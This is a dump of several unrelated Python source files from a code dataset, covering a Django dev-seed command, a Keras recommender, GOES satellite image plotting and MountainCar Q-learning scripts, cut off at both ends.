django.core.management.commands.migrate import Command as MigCommand\nfrom django.db.utils import DEFAULT_DB_ALIAS\n\nfrom wurst.core.models import Project\n\nfrom .wurst_import_schema import Command as WISCommand\n\n\nclass Command(BaseCommand):\n \"\"\"\n Seed the application with models suitable for development.\n \"\"\"\n\n def handle(self, *args, **options):\n MigCommand().handle(database=DEFAULT_DB_ALIAS, app_label=(), **options)\n schema_path = os.path.join(\n os.path.dirname(__file__),\n \"..\", # management\n \"..\", # wurst\n \"schemata\",\n \"basic.toml\"\n )\n WISCommand().handle(file=schema_path, **options)\n user_model = get_user_model()\n if not user_model.objects.filter(is_superuser=True).exists():\n user_model.objects.create_superuser(\"admin\", \"admin@example.com\", \"admin\")\n self.stdout.write(\"Created superuser (username = admin, password = admin)\")\n if not Project.objects.exists():\n Project.objects.create(slug=\"test\", name=\"Test\", prefix=\"T-\")\n self.stdout.write(\"Created Test project\")\n","sub_path":"wurst/core/management/commands/wurst_dev_seed.py","file_name":"wurst_dev_seed.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"647187732","text":"import os\nimport csv\n\nfrom park_api import env\n\n\ndef find_forecast(lot_id, time_from, time_to):\n try:\n csv_path = os.path.join(env.APP_ROOT, \"forecast_data\", lot_id + \".csv\")\n\n with open(csv_path) as csvfile:\n data = {\n \"version\": 1.0,\n \"data\": {}\n }\n for row in csv.reader(csvfile):\n if time_from <= row[0] <= time_to:\n data[\"data\"][row[0]] = row[1]\n return data\n except FileNotFoundError:\n return None\n","sub_path":"park_api/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479410443","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/metadata_client/modules/instrument.py\n# Compiled at: 2019-11-15 04:27:31\n# Size of source mod 2**32: 2724 bytes\n\"\"\"Instrument module class\"\"\"\nfrom apis.instrument_api import InstrumentApi\nfrom common.base import Base\nfrom ..common.config import *\nMODULE_NAME = INSTRUMENT\n\nclass Instrument(InstrumentApi):\n\n def __init__(self, metadata_client, name, identifier, url, facility_id, instrument_type_id, repository_id, flg_available, description=''):\n self.metadata_client = metadata_client\n self.id = None\n self.name = name\n self.identifier = identifier\n self.url = url\n self.facility_id = facility_id\n self.instrument_type_id = instrument_type_id\n self.repository_id = repository_id\n self.flg_available = flg_available\n self.description = description\n\n @staticmethod\n def get_by_id(mdc_client, instrument_id):\n response = mdc_client.get_instrument_by_id_api(instrument_id)\n Base.cal_debug(MODULE_NAME, 'get_by_id', response)\n return Base.format_response(response, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_by_topic_id(mdc_client, facility_id):\n resp = mdc_client.get_all_instruments_by_topic_id_api(facility_id)\n Base.cal_debug(MODULE_NAME, 'get_all_by_topic_id', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_by_facility_id(mdc_client, facility_id):\n resp = mdc_client.get_all_instruments_by_facility_id_api(facility_id)\n Base.cal_debug(MODULE_NAME, 'get_all_by_facility_id', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_all_from_xfel(mdc_client):\n xfel_fac_id = 1\n resp = mdc_client.get_all_instruments_by_facility_id_api(xfel_fac_id)\n Base.cal_debug(MODULE_NAME, 'get_all_from_xfel', resp)\n return Base.format_response(resp, GET, OK, MODULE_NAME)\n\n @staticmethod\n def get_by_identifier(mdc_client, identifier):\n response = mdc_client.get_all_instruments_by_identifier_api(identifier)\n Base.cal_debug(MODULE_NAME, 'get_by_identifier', response)\n return Base.format_response(response, GET, OK, MODULE_NAME)\n\n def __get_resource(self):\n instrument = {MODULE_NAME: {'name':self.name, \n 'identifier':self.identifier, \n 'url':self.url, \n 'facility_id':self.facility_id, \n 'topic_id':self.topic_id, \n 'instrument_type_id':self.instrument_type_id, \n 'repository_id':self.repository_id, \n 'flg_available':self.flg_available, \n 'description':self.description}}\n return instrument","sub_path":"pycfiles/metadata_client-3.0.5-py3.7/instrument.cpython-37.py","file_name":"instrument.cpython-37.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"371793666","text":"import dearpygui.dearpygui as dpg\n\ndpg.create_context()\n\n\ndef change_text(sender, app_data):\n dpg.set_value(app_data[1], f\"Mouse Button ID: {app_data}\")\n\n\ndef visible_call(sender, app_data):\n print(\"I'm visible\")\n\n\nwith dpg.item_handler_registry(tag=\"widget handler\") as handler:\n dpg.add_item_clicked_handler(callback=change_text)\n dpg.add_item_visible_handler(callback=visible_call)\n\nwith dpg.window(width=500, height=300):\n text_1 = dpg.add_text(\"Click me with any mouse button\", tag=\"text item\")\n text_2 = dpg.add_text(\"Close window with arrow to change visible state printing to console\", tag=\"text item 2\")\n\n# bind item handler registry to item\ndpg.bind_item_handler_registry(text_1, \"widget handler\")\ndpg.bind_item_handler_registry(text_2, \"widget handler\")\n\ndpg.create_viewport(title='Custom Title', width=800, height=600)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()\n","sub_path":"CS/Programming_Languages/Python/Modules/exterior/topics/gui/dearPyGUI/documentation/_4_io_handlers_state_polling/_4_1_item_handlers/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36809633","text":"from _operator import itemgetter\nfrom datetime import datetime as dt\nfrom datetime import timedelta as td\nfrom math import log10\nfrom math import sqrt\nimport random\nimport time\n\nimport keras\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom pympler import asizeof\nimport scipy.sparse\nfrom scipy.sparse.csc import csc_matrix\nimport theano\n\nimport keras.backend as K\nimport keras.layers as kl\nimport keras.models as km\nimport numpy as np\nimport pandas as pd\nimport theano.tensor as T\n\n\nclass BPRNeuralCollaborativeFiltering:\n '''\n BPRNeuralCollaborativeFiltering( factors=8, layers=[64,32,16,8], batch=100, optimizer='adam', learning_rate=0.001, momentum=0.0, reg=0.01, emb_reg=1e-7, layer_reg=1e-7, dropout=0.0, skip=0, samples=2048, activation='linear', objective='bpr_max', epochs=10, shuffle=-1, include_artist=False, session_key = 'playlist_id', item_key= 'track_id', user_key= 'playlist_id', artist_key='artist_id', time_key= 'pos' )\n\n Parameters\n -----------\n '''\n \n def __init__( self, factors=8, layers=[64,32,16,8], batch=100, optimizer='adam', learning_rate=0.001, momentum=0.0, reg=0.01, emb_reg=1e-7, layer_reg=1e-7, dropout=0.0, skip=0, samples=2048, activation='linear', objective='bpr_max', epochs=10, shuffle=-1, include_artist=False, session_key = 'playlist_id', item_key= 'track_id', user_key= 'playlist_id', artist_key='artist_id', time_key= 'pos' ):\n \n self.factors = factors\n self.layers = layers\n self.batch = batch\n self.learning_rate = learning_rate\n self.momentum = momentum\n self.optimizer = optimizer\n self.regularization = reg\n self.samples = samples\n self.dropout = dropout\n self.skip = skip\n self.shuffle = shuffle\n self.epochs = epochs\n self.activation = activation\n self.objective = objective\n self.include_artist = include_artist\n \n self.emb_reg = emb_reg\n self.layer_reg = layer_reg\n self.final_reg = reg\n \n self.session_key = session_key\n self.item_key = item_key\n self.user_key = user_key\n self.artist_key = artist_key\n self.time_key = time_key\n \n self.floatX = theano.config.floatX\n self.intX = 'int32'\n \n \n def train(self, train, test=None):\n '''\n Trains the predictor.\n \n Parameters\n --------\n data: pandas.DataFrame\n Training data. It contains the transactions of the sessions. It has one column for session IDs, one for item IDs and one for the timestamp of the events (unix timestamps).\n It must have a header. Column names are arbitrary, but must correspond to the ones you set during the initialization of the network (session_key, item_key, time_key properties).\n \n '''\n \n data = train['actions']\n datat = test['actions']\n \n data = pd.concat( [data, datat] )\n \n start = time.time()\n \n self.unique_items = data[self.item_key].unique().astype( self.intX )\n \n self.num_items = data[self.item_key].nunique()\n self.num_users = data[self.user_key].nunique()\n self.num_artists = data[self.artist_key].nunique()\n #idx = [data[self.item_key].max()+1] + list( data[self.item_key].unique() )\n self.itemmap = pd.Series( data=np.arange(self.num_items), index=data[self.item_key].unique() ).astype( self.intX )\n self.usermap = pd.Series( data=np.arange(self.num_users), index=data[self.user_key].unique() ).astype( self.intX )\n self.artistmap = pd.Series( data=np.arange(self.num_artists), index=data[self.artist_key].unique() ).astype( self.intX )\n\n print( 'finished init item and user map in {}'.format( ( time.time() - start ) ) )\n \n train = data\n \n start = time.time()\n \n self.num_sessions = train[self.session_key].nunique()\n \n train = pd.merge(train, pd.DataFrame({self.item_key:self.itemmap.index, 'ItemIdx':self.itemmap[self.itemmap.index].values}), on=self.item_key, how='inner')\n train = pd.merge(train, pd.DataFrame({self.user_key:self.usermap.index, 'UserIdx':self.usermap[self.usermap.index].values}), on=self.user_key, how='inner')\n train = pd.merge(train, pd.DataFrame({self.artist_key:self.artistmap.index, 'ArtistIdx':self.artistmap[self.artistmap.index].values}), on=self.artist_key, how='inner')\n #train.sort_values([self.session_key, self.time_key], inplace=True)\n \n self.itemartistmap = train.groupby( 'ItemIdx' )['ArtistIdx'].min()\n self.itemartistmap = pd.Series( index=self.itemartistmap.index, data = self.itemartistmap.values )\n \n self.model, self.predict_model = self.init_model( train )\n \n print( 'finished init model in {}'.format( ( time.time() - start ) ) )\n \n start = time.time()\n \n for j in range( self.epochs ):\n \n starttmp = time.time()\n \n U, I, N, A, AN = self.get_train_data( train )\n \n print( 'finished creating samples in {}'.format( ( time.time() - starttmp ) ) )\n \n print( 'train epoch {} with {} examples'.format( j, len(U) ) )\n \n input = [np.array(U), np.array(I), np.array(N)]\n if self.include_artist:\n input += [ np.array(A), np.array(AN) ]\n \n hist = self.model.fit(input, #input\n None, # labels \n batch_size=self.batch, epochs=1, shuffle=True, verbose=2 )\n \n print( 'finished epoch {} in {}s'.format( j, ( time.time() - start ) ) )\n \n def get_train_data( self, train ):\n \n #train = train.sample(frac=1).reset_index(drop=True)\n \n train['ItemIdxNeg'] = np.random.choice( self.itemmap.values, len(train) )\n items = train['ItemIdxNeg'].values\n train['ArtistIdxNeg'] = self.itemartistmap[ items ].values\n return train['UserIdx'].values, train['ItemIdx'].values, train['ItemIdxNeg'].values, train['ArtistIdx'].values, train['ArtistIdxNeg'].values\n \n def init_model(self, train, std=0.01):\n \n #current_item = kl.Input( ( 1, ), name=\"current_item\" )\n \n item = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.,self.steps) )\n user = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.batch,1) )\n \n if self.include_artist:\n artist = kl.Input( (1,), dtype=self.intX )#, batch_shape=(self.batch,1) )\n \n emb_user_mf = Embedding( output_dim=self.factors, input_dim=self.num_users, embeddings_regularizer=l2(self.emb_reg) )\n emb_user = Embedding( output_dim=self.factors, input_dim=self.num_users, embeddings_regularizer=l2(self.emb_reg) )\n emb_item_mf = Embedding( output_dim=self.factors, input_dim=self.num_items, embeddings_regularizer=l2(self.emb_reg) )\n emb_item = Embedding( output_dim=self.factors, input_dim=self.num_items, embeddings_regularizer=l2(self.emb_reg) )\n \n if self.include_artist:\n emb_user_artist_mf = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n emb_artist_mf = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n emb_artist = Embedding( output_dim=self.factors, input_dim=self.num_artists, embeddings_regularizer=l2(self.emb_reg) )\n \n #MF PART \n \n uemb = kl.Flatten()( emb_user_mf( user ) )\n iemb = kl.Flatten()( emb_item_mf( item ) )\n \n mf_dot = kl.Dot(1)( [uemb, iemb] )\n mf_mul = kl.Multiply()( [uemb, iemb] )\n \n mf_vector = kl.Concatenate()( [mf_mul, mf_dot] )\n \n #mf_vector = mf_mul\n \n if self.include_artist:\n uemb = kl.Flatten()( emb_user_artist_mf( user ) )\n aemb = kl.Flatten()( emb_artist_mf( item ) )\n mf_dot = kl.Dot(1)( [uemb, aemb] )\n mf_mul = kl.Multiply()( [uemb, aemb] )\n \n mf_vector = kl.Concatenate()( [mf_vector, mf_mul, mf_dot] )\n \n #MLP PART\n \n uemb = kl.Flatten()( emb_user( user ) )\n iemb = kl.Flatten()( emb_item( item ) )\n \n mlp_vector = kl.Concatenate()( [uemb, iemb] )\n if self.include_artist:\n emba = kl.Flatten()( emb_artist( artist ) )\n mlp_vector = kl.Concatenate()( [mlp_vector, emba] )\n \n for i in range( len(self.layers) ):\n layer = kl.Dense( self.layers[i], activation='relu', name=\"layer%d\" %i, kernel_regularizer=l2(self.layer_reg) )\n mlp_vector = layer(mlp_vector)\n \n #PRED PART\n \n comb = kl.Concatenate()( [ mf_vector , mlp_vector ] ) #, uemb ] )\n \n fff = kl.Dense( 1, activation='linear', kernel_initializer='lecun_uniform', kernel_regularizer=l2(self.layer_reg) )\n res = fff(comb)\n \n inputs = [ user, item ] #+ [artist\n if self.include_artist:\n inputs += [ artist ]\n outputs = [ res ]\n \n predict_model = km.Model( inputs, outputs )\n \n current_user = kl.Input( ( 1, ), name=\"current_user\" )# , batch_shape=(self.batch, self.steps) )\n current_item_pos = kl.Input( (1,), dtype=self.intX, name=\"current_item_pos\" )#, batch_shape=(self.batch,1) )\n current_item_neg = kl.Input( (1,), dtype=self.intX, name=\"current_item_neg\" )#, batch_shape=(self.batch,1) )\n \n pred_from_pos = [ current_user, current_item_pos ]\n pred_from_neg = [ current_user, current_item_neg ]\n \n if self.include_artist:\n current_artist_pos = kl.Input( ( 1, ), name=\"current_artist_pos\" )# , batch_shape=(self.batch, self.steps) )\n current_artist_neg = kl.Input( ( 1, ), name=\"current_artist_neg\" )# , batch_shape=(self.batch, self.steps) )\n pred_from_neg += [current_artist_neg]\n pred_from_pos += [current_artist_pos]\n \n current_res_pos = predict_model( pred_from_pos ) #, current_user ] )\n current_res_neg = predict_model( pred_from_neg ) #, current_user ] )\n \n inputs = [ current_user, current_item_pos, current_item_neg ] #+ [current_user]\n if self.include_artist:\n inputs += [current_artist_pos,current_artist_neg]\n outputs = [ current_res_pos, current_res_neg ]\n \n model = km.Model( inputs, outputs )\n model.add_loss(K.mean( self.bpr(outputs) ))\n \n if self.optimizer == 'adam': \n opt = keras.optimizers.Adam(lr=self.learning_rate)\n elif self.optimizer == 'adagrad':\n opt = keras.optimizers.Adagrad(lr=self.learning_rate)\n elif self.optimizer == 'adadelta':\n opt = keras.optimizers.Adadelta(lr=self.learning_rate*10)\n elif self.optimizer == 'sgd':\n opt = keras.optimizers.SGD(lr=self.learning_rate)\n \n model.compile( optimizer=opt )\n \n return model, predict_model\n \n def bpr(self, out):\n pos, neg = out\n obj = -K.sum( K.log( K.sigmoid( pos - neg ) ) )\n return obj\n \n def predict( self, name=None, tracks=None, playlist_id=None, artists=None ):\n '''\n Gives predicton scores for a selected set of items on how likely they be the next item in the session.\n \n Parameters\n --------\n name : int or string\n The session IDs of the event.\n tracks : int list\n The item ID of the event. Must be in the set of item IDs of the training set.\n \n Returns\n --------\n res : pandas.DataFrame\n Prediction scores for selected items on how likely to be the next item of this session. Indexed by the item IDs.\n \n '''\n \n sitems = tracks if tracks is not None else []\n \n if len(sitems) == 0:\n res_dict = {}\n res_dict['track_id'] = []\n res_dict['confidence'] = []\n return pd.DataFrame.from_dict(res_dict)\n \n \n u = np.full( self.num_items , self.usermap[playlist_id], dtype=self.intX)\n i = np.array( self.itemmap.values )\n input = [ u,i ]\n if self.include_artist:\n a = np.array( self.artistmap[ self.itemartistmap[ self.itemmap.values ] ] )\n input += [a]\n# usera = np.zeros((1))\n# usera[0] = self.usermap[input_user_id]\n \n \n \n predictions = self.predict_model.predict( input, batch_size=len(i) ) #, usera ] )\n #predictions = self.predict( self.session_items, self.itemmap[input_item_id], self.usermap[input_user_id] )\n \n try:\n \n # Create things in the format\n res_dict = {}\n res_dict['track_id'] = list(self.itemmap.index)\n res_dict['confidence'] = predictions.T[0]\n res = pd.DataFrame.from_dict(res_dict)\n \n res = res[ ~np.in1d( res.track_id, sitems ) ]\n \n res.sort_values( 'confidence', ascending=False, inplace=True )\n \n except Exception:\n print( 'hö' )\n print( self.itemmap.index )\n print( predictions )\n print( len(predictions[0]) )\n exit()\n \n return res.head(500)\n \n","sub_path":"RecSys2018-team-KAENEN_main_creative-7th_3rd-place/algorithms/mf/ncf_bpr.py","file_name":"ncf_bpr.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"436646107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 14 10:48:41 2018\n\n@author: cpaessvisitor\n\"\"\"\n\nfrom netCDF4 import Dataset\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap # Import the Basemap toolkit\nfrom pyproj import Proj\nfrom matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport os\nimport glob\nimport sys\n\n\n#RGB values must be between 0 and 1\n\n# Rebin function from https://stackoverflow.com/questions/8090229/resize-with-averaging-or-rebin-a-numpy-2d-array\ndef rebin(a, shape):\n sh = shape[0],a.shape[0]//shape[0],shape[1],a.shape[1]//shape[1]\n return a.reshape(sh).mean(-1).mean(1)\n\n\nformatstr = '*L1b-RadC-M3C'\ndatestr = '*s2017*' \n\n\n#Put into fns all the files from a directory corresponding to year 2017, a certain day and a certain hour\nfns = []\nnch = 1\nfor nch in range(1,17):\n chstr = str(nch).zfill(2)\n fns.append(sorted(glob.glob(formatstr+chstr+datestr+'*.nc')))\n\n\n#Get the number of photographies per band\nnum_photos = np.shape(fns)[1]\n\n#Choose the number of the photography (i.e 0)\nphoto = 10\n\n#Get the full name of the path to the nc file\nfn1 = fns[0][photo]\npath = fn1\n\n\n# Search for the Scan start in the file name\nStart = (path[path.find(\"s\")+1:path.find(\"_e\")])\nStart_Formatted = Start[0:4] + \" Day \" + Start[4:7] + \" - \" + Start [7:9] + \":\" + Start [9:11] + \":\" + Start [11:13] + \".\" + Start [13:14] + \" UTC\"\n# Search for the Scan end in the file name\nEnd = (path[path.find(\"e\")+1:path.find(\"_c\")])\nEnd_Formatted = End[0:4] + \" Day \" + End[4:7] + \" - \" + End [7:9] + \":\" + End [9:11] + \":\" + End [11:13] + \".\" + End [13:14] + \" UTC\"\n\n#Find files corresponding to red and veggie and IR\nifn2 = [i for i, s in enumerate(fns[1][:]) if Start in s]\nifn3 = [i for i, s in enumerate(fns[2][:]) if Start in s]\nifn13 = [i for i, s in enumerate(fns[12][:]) if Start in s]\n\n#Get the path of these three files\nfn2 = fns[1][ifn2[0]]\nStart2 = (fn2[fn2.find(\"s\")+1:fn2.find(\"_e\")])\nfn3 = fns[2][ifn3[0]]\nStart3 = (fn3[fn3.find(\"s\")+1:fn3.find(\"_e\")])\nfn13 = fns[12][ifn13[0]]\nStart13 = (fn13[fn13.find(\"s\")+1:fn13.find(\"_e\")])\n \n\n\n# Define some constants needed for the conversion of radiance per unit wavenumber to radiance only\nEsun_Ch_01 = 726.721072\nEsun_Ch_02 = 663.274497\nEsun_Ch_03 = 441.868715\nd2 = 0.3\n\n\n#Load Channel 1 - Blue Visible\ng16nc = Dataset(fn1)\nradiance_1 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_1 = (radiance_1 * np.pi * d2) / Esun_Ch_01\n# Make sure all data is in the valid RGB data range\nref_1 = np.maximum(ref_1, 0.0)\nref_1 = np.minimum(ref_1, 1.0)\nref_gamma_1 = np.sqrt(ref_1)\n\n#Load Channel 2 - Red Visible\ng16nc = Dataset(fn2)\nradiance_2 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_2 = (radiance_2 * np.pi * d2) / Esun_Ch_02\n# Make sure all data is in the valid RGB data range\nref_2 = np.maximum(ref_2, 0.0)\nref_2 = np.minimum(ref_2, 1.0)\nref_gamma_2 = np.sqrt(ref_2)\nref_gamma_2 = rebin(ref_gamma_2, ref_gamma_1.shape)\n\n# Load Channel 3 - Veggie Near IR\ng16nc = Dataset(fn3)\nradiance_3 = g16nc.variables['Rad'][:]\ng16nc.close()\ng16nc = None\nref_3 = (radiance_3 * np.pi * d2) / Esun_Ch_03\n# Make sure all data is in the valid RGB data range\nref_3 = np.maximum(ref_3, 0.0)\nref_3 = np.minimum(ref_3, 1.0)\nref_gamma_3 = np.sqrt(ref_3)\n\n#Turn veggie into approximate green\nref_gamma_3_true = 0.48358168 * ref_gamma_2 + 0.45706946 * ref_gamma_1 + 0.06038137 * ref_gamma_3\n\n\n#Do something to have the space white\nmasque = np.where(ref_gamma_3.mask == True)\nalpha = np.ones(ref_gamma_3.shape)\nalpha[masque] = 0.0\n\n\n#Plot geostationnary picture\ntruecolor = np.stack([ref_gamma_2, ref_gamma_3_true, ref_gamma_1, alpha], axis=2)\nim = plt.imshow(truecolor)\nplt.title(\"True Color\" + \"\\n Scan from \" + Start_Formatted + \" to \" + End_Formatted, color='black')\nplt.show()\n\n\n\n\n\n\n#More sophisticated plot\ng16nc = Dataset(fn1)\n# Satellite height\nsat_h = g16nc.variables['goes_imager_projection'].perspective_point_height\n\n# Satellite longitude\nsat_lon = g16nc.variables['goes_imager_projection'].longitude_of_projection_origin\n\n# Satellite sweep\nsat_sweep = g16nc.variables['goes_imager_projection'].sweep_angle_axis\n\n# The projection x and y coordinates equals\n# the scanning angle (in radians) multiplied by the satellite height (http://proj4.org/projections/geos.html)\nX = g16nc.variables['x'][:] * sat_h\nY = g16nc.variables['y'][:] * sat_h\n\n\n# The geostationary projection is perhaps the easiest way to plot the image on a map.\n# Essentially, we are stretching the image across a map with the same projection and dimensions.\nm = Basemap(projection='geos', lon_0=sat_lon,\n resolution='i', area_thresh=5000,\n llcrnrx=X.min(),llcrnry=Y.min(),\n urcrnrx=X.max(),urcrnry=Y.max())\n\n\nplt.figure(figsize=[15, 12])\nm.imshow(np.flipud(truecolor)) # Remember, \"images\" are upside down, so flip up/down\nm.drawcoastlines()\nm.drawcountries()\nm.drawstates()\n\nplt.title(\"True Color\" + \"\\n Scan from \" + Start_Formatted + \" to \" + End_Formatted, color='black')\n\ng16nc.close()\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"Code_Files/Plot_TrueColor_ncdf4.py","file_name":"Plot_TrueColor_ncdf4.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536170096","text":"import numpy as np\nimport gym\nimport random\nimport math\nimport tensorflow as tf\nimport matplotlib.pylab as plt\n\n# size of the training batch\nBATCH_SIZE=50\n\nMAX_EPS = 1\nMIN_EPS = 0.01\nLAMBDA = 0.0001\nGAMMA = 0.99\n\nclass Memory:\n \"\"\"\n The memory class\n stores samples (state,action,reward,nextState) as tuples into _samples\n\n Attributes\n ----------\n _samples : list of tuples\n list containing max_memory elements\n _max_memory : int\n maximum number of tuples that can be injected into _samples\n \"\"\"\n\n def __init__(self, max_memory):\n \"\"\" initialize the memory list \"\"\"\n self._max_memory = max_memory\n self._memory = []\n\n def addSample(self, sample):\n \"\"\" add a sample to the memory list \"\"\"\n self._memory.append(sample)\n if len(self._memory) > self._max_memory:\n self._memory.pop(0)\n\n def samples(self, nb_samples):\n \"\"\" return a random sample with nb_samples elements \"\"\"\n if nb_samples > len(self._memory):\n nb_samples = len(self._memory)\n return random.sample(self._memory,nb_samples)\n\n def size(self):\n return len(self._memory)\n\n# initialize the Memory\nmem = Memory(50000)\neps = MAX_EPS\n\n# initialize the game\nenv_name = 'MountainCar-v0'\nenv = gym.make(env_name)\nnumStates = env.env.observation_space.shape[0]\nnumActions = env.env.action_space.n\nprint(\"This game is a {} actions game\".format(numActions))\nprint(\"Environment is described by a {} elements vector\".format(numStates))\ninput(\"Press Enter to continue...\")\n\n# initialize the model\n# input is a 2 dim vector or tensor (x position, velocity)\ntf.keras.backend.set_floatx('float64')\ninputs=tf.keras.Input(shape=(numStates,), name='states')\nx=tf.keras.layers.Dense((50), activation='relu')(inputs)\nx=tf.keras.layers.Dense((50), activation='relu')(x)\noutputs=tf.keras.layers.Dense(numActions,activation='linear')(x)\nmodel=tf.keras.Model(inputs=inputs,outputs=outputs,name='myLittleCar')\nmodel.compile(loss=\"mse\",optimizer=\"adam\",metrics=['mae'])\nprint(\"model created\")\nmodel.summary()\ninput(\"Press Enter to continue...\")\nprint(\"model starting to play the game\")\nnum_episodes = 300\n\nsteps=0\nreward_store = []\nmax_x_store = []\n\nfor episode in range(num_episodes):\n state = env.reset()\n if episode % 10 == 0:\n print('Episode {} of {}'.format(episode+1, num_episodes))\n print(\"memory length is {}\".format(mem.size()))\n tot_reward = 0\n max_x = -100\n while True:\n env.render()\n\n if random.random() < eps:\n action = random.randint(0, numActions - 1)\n else:\n rspd=state.reshape(1,numStates)\n # do not use high level function such as predict or predict_classes (in case you dont have to use argmax)\n predictionBrute = model(rspd)\n action = np.argmax(predictionBrute)\n\n # we realize the action\n nextState, reward, done, info = env.step(action)\n\n if nextState[0] >= 0.5:\n reward += 100\n print(\"Top of the hill reached after {} timesteps\".format(steps))\n elif nextState[0] >= 0.25:\n reward += 20\n elif nextState[0] >= 0.1:\n reward += 10\n if nextState[0] > max_x:\n max_x = nextState[0]\n if done:\n nextState = None\n\n # feed the memory\n mem.addSample((state,action,reward,nextState))\n\n # train the model - only if we have something representative in the memory\n if mem.size() > BATCH_SIZE * 3:\n train_samples=mem.samples(BATCH_SIZE)\n nb=len(train_samples)\n #print(\"we are going to train on a batch with {} elements\".format(nb))\n state_samples= np.array([val[0] for val in train_samples])\n nextState_samples= np.array([(np.zeros(numStates) if val[3] is None else val[3]) for val in train_samples])\n qsa=model(state_samples)\n qsad=model(nextState_samples)\n x=np.zeros((nb,numStates))\n y=np.zeros((nb,numActions))\n\n # according to the structure adopted for the memory\n # b[0] is state, b[1] is action, b[2] is reward and b[3] is the nextState\n for i, b in enumerate(train_samples):\n current_q = tf.unstack(qsa[i])\n if b[3] is None:\n current_q[b[1]]=b[2]\n else:\n current_q[b[1]]=b[2]+GAMMA*np.amax(qsad[i])\n x[i] = b[0]\n y[i] = tf.stack(current_q)\n\n # do not use model.fit(x, y, epochs=1, verbose=0)\n model.train_on_batch(x, y)\n\n # prepare next iteration\n # increase the step counter\n steps+=1\n # evaluate the new value for eps\n eps = MIN_EPS + (MAX_EPS - MIN_EPS) * math.exp(-LAMBDA * steps)\n # update state\n state = nextState\n\n tot_reward += reward\n\n if done:\n reward_store.append(tot_reward)\n max_x_store.append(max_x)\n break\n\n print(\"step {} Total reward {} Eps {}\".format(steps,tot_reward,eps))\n\nenv.close()\nplt.plot(reward_store)\nplt.show()\nplt.close(\"all\")\nplt.plot(max_x_store)\nplt.show()\nmodel.save('moutainCar.h5')\n","sub_path":"MountainCarPB/rl_MoutainCar_AC.py","file_name":"rl_MoutainCar_AC.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15256386","text":"#!/usr/bin/env python3\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nRENDER_EVERY = 200000\nSTATS_EVERY = 50\n\nBUCKET_AMOUNT = [20, 20]\nenv = gym.make('MountainCar-v0')\nBUCKET_SIZE = (env.observation_space.high - env.observation_space.low) / BUCKET_AMOUNT\n\n\ndef get_discrete_state(state):\n discrete_state = (state - env.observation_space.low) / BUCKET_SIZE\n return tuple(discrete_state.astype(np.int))\n\n\n# tune learning rate\ndef qlearning(env, q_table, alpha=0.1, gamma=0.9, epsilon=0.1,\n initial_learning_rate=1.0, min_learning_rate=0.005, num_ep=int(5000)):\n\n ep_rewards = []\n ep_lengths = []\n ep_goal = []\n aggr_ep_rewards = {'ep': [], 'avg': [], 'max': [], 'min': []}\n aggr_ep_goal = {'ep': [], 'goal': [], 'length': []}\n\n for episode in range(num_ep):\n episode_reward = 0\n episode_length = 0\n reached_goal = 0\n\n state = env.reset()\n discrete_state = get_discrete_state(state)\n done = False\n\n learning_rate = max(min_learning_rate, initial_learning_rate * (0.85 ** (episode // 100)))\n\n while not done:\n if np.random.uniform(0, 1) > epsilon:\n action = np.argmax(q_table[discrete_state])\n else:\n action = env.action_space.sample()\n\n new_state, reward, done, _ = env.step(action)\n new_discrete_state = get_discrete_state(new_state)\n\n if (episode + 1) % RENDER_EVERY == 0:\n env.render()\n\n q_table[discrete_state + (action,)] += learning_rate * (reward + gamma *\n np.max(q_table[new_discrete_state]) -\n q_table[discrete_state + (action,)])\n\n if new_state[0] >= env.goal_position:\n reached_goal += 1\n\n discrete_state = new_discrete_state\n\n episode_reward += reward\n episode_length += 1\n\n ep_rewards.append(episode_reward)\n ep_lengths.append(episode_length)\n ep_goal.append(reached_goal)\n\n if not episode % STATS_EVERY:\n if episode == 0:\n average_reward = ep_rewards[0]\n else:\n average_reward = sum(ep_rewards[-STATS_EVERY:]) / STATS_EVERY\n aggr_ep_rewards['ep'].append(episode)\n aggr_ep_rewards['avg'].append(average_reward)\n aggr_ep_rewards['max'].append(max(ep_rewards[-STATS_EVERY:]))\n aggr_ep_rewards['min'].append(min(ep_rewards[-STATS_EVERY:]))\n if episode == 0:\n 